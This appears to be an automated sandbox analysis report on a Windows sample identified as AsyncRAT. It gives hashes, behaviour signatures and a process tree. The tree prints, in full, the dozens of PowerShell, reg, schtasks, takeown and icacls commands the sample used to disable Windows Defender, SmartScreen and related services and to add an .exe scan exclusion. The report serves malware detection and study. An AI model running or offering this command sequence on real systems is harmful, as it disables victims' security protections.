Analysis

  • max time kernel
    287s
  • max time network
    294s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07-12-2024 06:54

General

  • Target

    Apsgmjd_Belphegor_obf.exe

  • Size

    188KB

  • MD5

    a37ccab1ff586abb6e43113ab8a2b10d

  • SHA1

    b9b97fc3bdcf3eb35ad68130a34ecaceef936bac

  • SHA256

    46af4880547cfe5d6c873f86f7b172640ddffd445794dcbc213ebb399e38a226

  • SHA512

    733115ebe0a453b6aef0e73677525c5f2e3aec1bb1327794db20d2403fdf62fac5ef4ba6d951d03904e877de6475032840eb0b4272a62e8a97d818cbbb2a8aeb

  • SSDEEP

    3072:7BhYrfk5BR4ko5ZTFW9bwFaqiUrD7Lz6U+x+:ckl5QNFW9b2aqDnJ+

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 17 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Async RAT payload 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 29 IoCs

    Using powershell.exe command.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 3 IoCs
  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies registry key 1 TTPs 24 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 61 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Apsgmjd_Belphegor_obf.exe
    "C:\Users\Admin\AppData\Local\Temp\Apsgmjd_Belphegor_obf.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Windows security bypass
    • Checks computer location settings
    • Windows security modification
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4504
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5584
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5064
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5596
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" delete HKLM\Software\Policies\Microsoft\Windows Defender /f
        3⤵
        • Modifies registry key
        PID:4864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5644
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:2872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5712
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiVirus /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5812
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine /v MpEnablePus / t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:5192
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5872
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5268
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5940
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableIOAVProtection /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:5212
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6068
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:6348
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4412
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5724
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6308
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
        3⤵
        • Modifies registry key
        PID:6404
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6512
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6692
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5772
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:556
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SpynetReporting /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:3336
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:536
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
        3⤵
        • Modifies registry key
        PID:5232
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3124
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:5152
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4448
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:5216
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6380
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh /Disable
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1192
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6908
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance /Disable
        3⤵
          PID:5736
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2980
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cleanup /Disable
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:828
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan /Disable
          3⤵
          • System Location Discovery: System Language Discovery
          PID:6508
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3576
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Verification /Disable
          3⤵
          • System Location Discovery: System Language Discovery
          PID:5632
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3492
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1480
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3692
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:6664
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:4980
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" delete HKCR\*\shellex\ContextMenuHandlers\EPP /f
          3⤵
            PID:5808
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5048
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
            3⤵
              PID:3040
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4956
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f
              3⤵
              • System Location Discovery: System Language Discovery
              PID:6512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3584
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
              3⤵
              • Modifies Security services
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:740
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2628
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
              3⤵
              • Modifies Security services
              • Modifies registry key
              PID:5124
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4188
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
              3⤵
              • Modifies Security services
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3512
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:3764
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
              3⤵
              • Modifies Security services
              • Modifies registry key
              PID:6624
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2460
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
              3⤵
              • Modifies security service
              • Modifies registry key
              PID:5804
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6544
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f
              3⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:4444
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" takeown /f "%systemroot%\System32\smartscreen.exe" /a
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:5836
            • C:\Windows\SysWOW64\takeown.exe
              "C:\Windows\system32\takeown.exe" /f %systemroot%\System32\smartscreen.exe /a
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:6920
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /reset
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:6672
            • C:\Windows\SysWOW64\icacls.exe
              "C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /reset
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:5408
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" taskkill /im smartscreen.exe /f
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1640
            • C:\Windows\SysWOW64\taskkill.exe
              "C:\Windows\system32\taskkill.exe" /im smartscreen.exe /f
              3⤵
              • System Location Discovery: System Language Discovery
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:5892
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
            2⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:7128
            • C:\Windows\SysWOW64\icacls.exe
              "C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
              3⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • System Location Discovery: System Language Discovery
              PID:1332
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension .exe
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4872
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:116
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -PUAProtection disable
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1528
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:628
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:832
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:6424
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:5744
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3100
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:4284
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3116
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1064
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1632
